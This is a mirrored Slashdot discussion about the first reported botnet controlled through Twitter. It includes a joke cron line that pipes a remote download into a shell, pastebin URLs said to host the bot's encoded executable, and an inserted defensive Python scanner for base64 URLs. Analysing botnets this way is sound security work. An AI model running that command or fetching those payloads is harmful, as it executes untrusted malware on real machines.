Slashdot Mirror


Twitter Used To Control Botnet Machines

DikSeaCup writes "Arbor Networks' Jose Nazario, an expert on botnets, discovered what looks to be the first reported case of hackers using Twitter to control botnets. 'Hackers have long used IRC chat rooms to control botnets, and have continually used clever technologies, such as peer-to-peer strategies, to counter efforts to track, disrupt and sometimes decapitate the bots. Perhaps what's surprising then is that it's taken so long for hackers to take Twitter to the dark side.' The next step, of course, is to code the tweets in such a way that they aren't so suspicious."

29 of 127 comments

  1. sweet by Eleed · · Score: 2, Insightful

    More reasons to hate Twitter

    1. Re:sweet by Marxist+Hacker+42 · · Score: 2, Insightful

      Quite possibly. My objection to twitter is the same as all bandwidth-limited Web 2.0 solutions; shorter messages encourage bad grammar and worse content.

      And at 120 chars, that makes the bad grammar and worse content *very bad*.

      --
      SJW: a person who perceives an injustice, and while correcting it, commits a greater injustice.
  2. Sure, but by operator_error · · Score: 4, Funny

    Sure Twitter is just a large botnet, but is anyone really in control?

  3. Holy shit! by SatanicPuppy · · Score: 5, Funny

    Who knew Twitter had a use?!?!

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
    1. Re:Holy shit! by Korin43 · · Score: 4, Insightful

      So basically we need email, but with a 150 character limit?

    2. Re:Holy shit! by michaelhood · · Score: 3, Funny

      > Twitter (read: mircoblogging) has tons of potential just waiting for imaginative developers.

      Funny slip that you should call it "mircoblogging" since Twitter is basically logged IRC without channels (hashtags even use #) and a dysfunctional search. Welcome to 15 years ago, kids.

    3. Re:Holy shit! by AP31R0N · · Score: 2, Funny

      No can do. i'm entirely too stupid. i am so humbled before your superiority that all i can manage is to tell you how dumbfounded i am at your magnificence. You're clearly smarter than all the people working on using twitter for these applications. You could be the hero who saves the world, why are you keeping this secret to yourself? Save us!

      --
      Utilizing the synergization of benchmark e-solutions to pre-workaround action items!
    4. Re:Holy shit! by davester666 · · Score: 3, Funny

      Somebody finally found a way to monetize Twitter!

      --
      Sleep your way to a whiter smile...date a dentist!
    5. Re:Holy shit! by timeOday · · Score: 3, Informative

      I think he's right. I asked a twit co-worker what the heck it was for, and he said aggregating all the various sorts of information, email, texts, rss, etc. My question was why did we split them up in the first place? It should all be email. (Especially texts, I'll never accept that one). Now get off my Korean lawn.

  4. Reliable by Marillion · · Score: 5, Insightful

    Twitter isn't as reliable as IRC.

    --
    This is a boring sig
  5. It's not suspicious already by Ponga · · Score: 2, Insightful

    This is about as interesting and informative as everything else being posted to Twitter!!
    http://www.wired.com/images_blogs/threatlevel/2009/08/botnet_arbor.jpg
    :D

    1. Re:It's not suspicious already by sootman · · Score: 3, Funny

      Hmm... so you're saying I should take out this cron entry...

      * * * * * curl twitter.com/evilguy | sh

      ... that I added per the instructions in some stranger's .sig?

      --
      Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  6. please do go down that rabbit hole ... by neonprimetime · · Score: 2, Interesting

    There's something ironic about this finding, given that Russian hackers allegedly used a botnet to take Twitter down for two days last week. But we won't go down that rabbit hole.

  7. Re:Alas, Babylon by clone53421 · · Score: 4, Insightful

    That's actually an interesting thought... it was sending obfuscated URLs to code that the zombie bots would download and execute.

    Wouldn't it make sense, rather than having Twitter simply kill the account, to allow the "good" guys to craft some sort of zombie-self-destruct and tweet its URL over the account? Imagine, all the bots automatically downloading and executing a specially designed tool that removes the malicious trojan...

    --
    Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
  8. I <3 English by sootman · · Score: 4, Funny

    "Twitter Used To Control Botnet Machines"

    It used to, but it doesn't anymore, right?

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  9. You go Jose! by GPLDAN · · Score: 4, Interesting

    Jose and those guys at Arbor are doing really concrete things to curb botnets and malware contagion. They have their gear in a great number of peering points around the world, and are correlating huge amounts of data into discrete patterns. I've seen Jose speak a couple of times, and I am impressed by the manner in which they are finding the ghosts who think they can't be found.

    1. Re:You go Jose! by 99BottlesOfBeerInMyF · · Score: 4, Interesting

      I've seen Jose speak a couple of times, and I am impressed by the manner in which they are finding the ghosts who think they can't be found.

      I haven't talked to Jose for a while, but last I heard he and the other guys were doing well finding new types of malware and separating out malicious network traffic that is hard to differentiate from legitimate traffic. That said, they were not really doing things to find the one off attacks perpetrated by people who weren't interested in large scale and automated network attacks. The people I'd call ghosts are the ones who do small scale, specifically targeted attacks to get what they want, then walk away. If you're running a botnet, you aren't being very ghostlike; maybe more vampire like :)

  10. Crowdsourced botnet by Kligat · · Score: 2, Interesting

    Wouldn't it be weird if someone made a botnet that would follow the directions of anyone that posted on Twitter, with people being able to suggest one command per day that would get upped or down by the masses? Aside from the programmer, who would be held responsible if it were operated like that?

    1. Re:Crowdsourced botnet by TheRaven64 · · Score: 3, Funny

      There's already a botnet like that, but it runs on poorly-secured human brains rather than computers.

      --
      I am TheRaven on Soylent News
  11. Twitter and many others! by hesaigo999ca · · Score: 3, Interesting

    Anything that can be pinged and return any sort of tcp/ip packets could be a control center if the contents of the packets can actually be translatable and have been mapped accordingly.

    i.e. ftp server has certain verbose return that may be configured based on what is being done, so the botnet program calls home to an ftp server...looking like a plain jane communication to anyone looking. It tries a few different commands to which the ftp server can reply (with error messages) it can not proceed, however inside the ftp server error message is a text string that contains certain key phrases.

    This scenario is similar to steganography, of hiding in plain sight, inside an image, the contents of data....
    I think it's cool to be able to pass off information that is hidden to regular onlookers, but is a lot of coding for nothing if you ask me.

    Set up a twitter account where a particular page has the commands for all your bots to follow, and....wait a minute....

  12. It's easy to do. by lymond01 · · Score: 5, Funny

    No onE would Think of uSing slashdoT As we aRen'T nearly as oBviOus as someThiNg likE Twitter. // Especially with all our talk about supporting Linux and such.

    1. Re:It's easy to do. by Pulse_Instance · · Score: 5, Funny

      We use linux to read slashdot so your net start does nothing to us.

  13. tried it, but... by wibald · · Score: 4, Funny

    Sure they tried using Twitter to control their botnet but after sending out one set of instructions they got bored and went back to playing MafiaWars on Facebook.

  14. Perl by BJ_Covert_Action · · Score: 4, Funny

    The next step, of course, is to code the tweets in such a way that they aren't so suspicious

    And people said that perl obfuscation, poetry, and golf tournaments didn't have any practical application. Ha!

    1. Re:Perl by bugnuts · · Score: 3, Funny

      upd4t3 posted:

      ^<@<.@*
      }"_# |
      -@$&/_%
      !( @|=>
      ;`+$?^?
      ,#"~|)^G

  15. Interesting code actually... by 0100010001010011 · · Score: 4, Informative

    From the looks of it, it's all base64 encoded shortened URLs.

    aHR0cDovL2 is http:///
    aHR0cDovL2JpdC5seS is http://bit.ly/

    The first one is clipped.
    The rest go to pastebinish sites which have gbpm.exe encoded as Base64. It also appears the base64 is different but the exe has the same name (I'm guessing it's changed 'output'?)

    http://rifers.org/paste/content/paste/9507/body?key=upd4t3
    http://rifers.org/paste/content/paste/9508/body?key=upd4t3
    http://rifers.org/paste/content/paste/9509/body?key=upd4t3

    They also use Pastebin (http://pastebin.com/pastebin.php?dl=m49f3b4c2) and Debian.net (http://paste.debian.net/44059/download/44059) but both of those files have been deleted.
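
The observation in the comment above, turned into a defender-side check (an added example, not code from the thread or from Arbor Networks): it scans status text for base64 tokens that begin with the encoded form of `http://` or `https://`, decodes them, and marks tokens that were clipped mid-group. The function names and sample statuses are constructed for illustration, and the URLs in them are placeholders.

```python
import base64
import binascii
import re

# base64("http://") always begins "aHR0cDovL" and base64("https://") begins
# "aHR0cHM6Ly"; the character after that depends on the next plaintext byte.
TOKEN_RE = re.compile(r"(?:aHR0cDovL|aHR0cHM6Ly)[A-Za-z0-9+/]*={0,2}")
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")

def decode_token(token):
    """Return (url, clipped) for a base64 token, or None if no URL is recoverable."""
    clipped = len(token) % 4 != 0            # cut mid-group, e.g. by a length limit
    if clipped:
        body = token.rstrip("=")
        token = body[: len(body) - len(body) % 4]   # keep whole 4-char groups only
    try:
        raw = base64.b64decode(token)
    except (binascii.Error, ValueError):
        return None
    m = URL_RE.match(raw)                    # printable URL at the start of the bytes
    return (m.group().decode("ascii"), clipped) if m else None

def scan(statuses):
    """Return a list of (index, decoded_url, clipped) for every encoded URL found."""
    hits = []
    for i, text in enumerate(statuses):
        for tok in TOKEN_RE.findall(text):
            decoded = decode_token(tok)
            if decoded:
                hits.append((i, decoded[0], decoded[1]))
    return hits

def encode_sample(url):
    """Helper used only to build the constructed sample data below."""
    return base64.b64encode(url.encode()).decode()

# Constructed sample statuses (placeholder URLs, not taken from the incident).
SAMPLE_STATUSES = [
    "having coffee, see http://example.com/menu",               # plaintext URL: ignored
    encode_sample("http://bit.ly/EXAMPLE1"),                    # whole status is a token
    "rt " + encode_sample("https://paste.example/raw/2") + " lol",
    encode_sample("http://bit.ly/EXAMPLE3")[:-3],               # clipped token
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_STATUSES):
        print(hit)
```

A clipped hit still yields the readable start of the URL, which is usually enough to pivot on the shortener or paste host in proxy logs.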

  16. U2VjcmV0IGNvZGU= by Anonymous Coward · · Score: 2, Funny

    d2hpbGUgKHRydWUpIHsNCiAgICBwaW5nIHR3aXR0ZXIuY29tDQp9

  17. Twitter only 98% pointless babble by David+Gerard · · Score: 2, Funny

    [to be posted uh tomorrow, probably]

    Only 98% of Twitter updates are "pointless babble," says a new report that studied 2,000 tweets over a period of two weeks.

    The top category was "pointless babble" tweets, with nearly 98% of tweets being inanity no sane person could want to read, retweets of inanity, links to inanity, retweets of links to inanity and retweets of retweets of links to links to the reretweet itself. And camera phone pictures of bowel movements on Twitpic.

    Almost 2% was Stephen Fry, Neil Gaiman or retweets thereof and the rest was Warren Ellis posting scatological abuse of his fans.

    Botnet command messages were becoming more popular, many disguised as combinations of the syllables "lol" "wtf" "d00d" "RT" and "#fb" or scatological abuse of Warren Ellis's fans.

    Twitter's demographics as of June 2009 were 55% female, 43% ages 18 to 34, 78% white, and 99.5% of such short attention spans that Facebook might as well be War and Peace. Botnet readership was considered likely to rise as soon, nothing with organic intelligence would be able to cope.

    Twitter recently redesigned its homepage, changing the tag "What are you doing now?" to "Post tomorrow's CNN headlines, particularly about #goatse."

    --
    http://rocknerd.co.uk
  18. Let's face it, all joking aside by Patchw0rk+F0g · · Score: 2, Insightful

    There ain't any technology that one human(s) can come up with that another human(s) can't corrupt.

    I don't care how quick, savvy or exotic you are, you're not going to foil everyone forever. I figure it's just a state of grace we have: there's a situation whereby the technology is benign, if asinine; a state whereby it's corrupted, abused and malicious; and a state whereby it's antiquated, unused, and maligned.

    I hope Twitter's now made it to that last stage now.

    --
    When the going gets weird, the weird turn pro. ~~ Hunter S. Thompson